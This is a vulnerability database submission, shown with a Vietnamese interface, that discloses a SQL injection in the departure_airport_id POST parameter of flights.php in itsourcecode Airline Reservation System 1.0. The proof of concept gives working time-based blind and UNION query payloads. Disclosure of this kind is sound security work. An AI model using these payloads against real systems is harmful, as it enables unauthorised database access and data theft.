Gửi #385895: itsourcecode Airline Reservation System 1.0 SQLithông tin

tiêu đềitsourcecode Airline Reservation System 1.0 SQLi
Mô tảIn the flights. php page, the occurrence of SQLi injection is due to insufficient filtering of the departure_airport_id parameter. ————POC———— Parameter: departure_airport_id (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: departure_airport_id=4' AND (SELECT 5140 FROM (SELECT(SLEEP(5)))gVLv) AND 'NWps'='NWps&arrival_airport_id=4&date=&date_return=&trip=1 Type: UNION query Title: Generic UNION query (NULL) - 12 columns Payload: departure_airport_id=4' UNION ALL SELECT CONCAT(0x7176767071,0x424b506d6250536942685a4254456d74566f536244496e6351716f4a6974504149794b5370625a54,0x71767a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&arrival_airport_id=4&date=&date_return=&trip=1
Nguồn⚠️ https://github.com/DeepMountains/zzz/blob/main/CVE1-4.md
Người dùng
 quad (UID 73025)
Đệ trình05/08/2024 10:04 (cách đây 2 những năm)
Kiểm duyệt05/08/2024 17:45 (8 hours later)
Trạng tháiđược chấp nhận
Mục VulDB273625 [itsourcecode Airline Reservation System 1.0 flights.php departure_airport_id Tiêm SQL]
điểm20

Do you need the next level of professionalism?

Upgrade your account now!